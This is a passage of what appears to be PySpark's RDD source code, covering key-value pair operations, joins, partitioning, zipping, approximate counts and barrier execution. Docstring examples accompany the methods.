>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with `numPartitions` partitions, or
the default parallelism level if `numPartitions` is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
`self` and `other`.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in `self` and (k, v2) is in `other`.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of `self` and `other`.
For each element (k, w) in `other`, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a full outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Similarly, for each element (k, w) in `other`, the resulting RDD will
either contain all pairs (k, (v, w)) for v in `self`, or the pair
(k, (None, w)) if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (self._memory_limit() / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
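# size is accumulated in bytes, so the shift by 20 expresses avg in MiB; the adjustment
# below keeps the average serialized chunk between roughly 1 MiB and 10 MiB.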
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- `createCombiner`, which turns a V into a C (e.g., creates
a one-element list)
- `mergeValue`, to merge a V into a C (e.g., adds it to the end of
a list)
- `mergeCombiners`, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
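# Hedged usage sketch (not part of the original source): aggregateByKey with a
# (sum, count) accumulator to compute per-key means. Assumes an active
# SparkContext bound to `sc`, as in the surrounding doctests.
# >>> rdd = sc.parallelize([("a", 1), ("a", 3), ("b", 2)])
# >>> seq = lambda acc, v: (acc[0] + v, acc[1] + 1)
# >>> comb = lambda a, b: (a[0] + b[0], a[1] + b[1])
# >>> sorted(rdd.aggregateByKey((0, 0), seq, comb).collect())
# [('a', (4, 2)), ('b', (2, 1))]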
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in `self` or `other`, return a resulting RDD that
contains a tuple with the list of values for that key in `self` as
well as `other`.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in `self` that has no pair with matching
key in `other`.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in `self` that is not contained in `other`.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying `f`.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
:meth:`zipWithIndex`.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into a Java object by Pyrolite, whether the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<https://doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _local_iterator_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self):
"""
.. note:: Experimental
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
:return: an :class:`RDDBarrier` instance that provides actions within a barrier stage.
.. seealso:: :class:`BarrierTaskContext`
.. seealso:: `SPIP: Barrier Execution Mode
<http://jira.apache.org/jira/browse/SPARK-24374>`_
.. seealso:: `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
.. versionadded:: 2.4.0
"""
return RDDBarrier(self)
def _is_barrier(self):
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > sc._jvm.PythonUtils.getBroadcastThreshold(sc._jsc): # Default 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class RDDBarrier(object):
"""
.. note:: Experimental
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
"""
def __init__(self, rdd):
self.rdd = rdd
def mapPartitions(self, f, preservesPartitioning=False):
"""
.. note:: Experimental
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
"""
def func(s, iterator):
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
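# Hedged usage sketch (not part of the original source): a barrier stage in
# which all tasks start together and synchronize once. Assumes an active
# SparkContext `sc`, pyspark.BarrierTaskContext (Spark 2.4+), and a cluster
# with enough free slots to launch all four tasks at the same time.
# >>> from pyspark import BarrierTaskContext
# >>> def sync_and_count(it):
# ...     tc = BarrierTaskContext.get()
# ...     tc.barrier()                # global barrier across the stage's tasks
# ...     yield sum(1 for _ in it)
# >>> sc.parallelize(range(8), 4).barrier().mapPartitions(sync_and_count).collect()
# [2, 2, 2, 2]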
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False, isFromBarrier=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = isFromBarrier or prev._is_barrier()
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning, self.is_barrier)
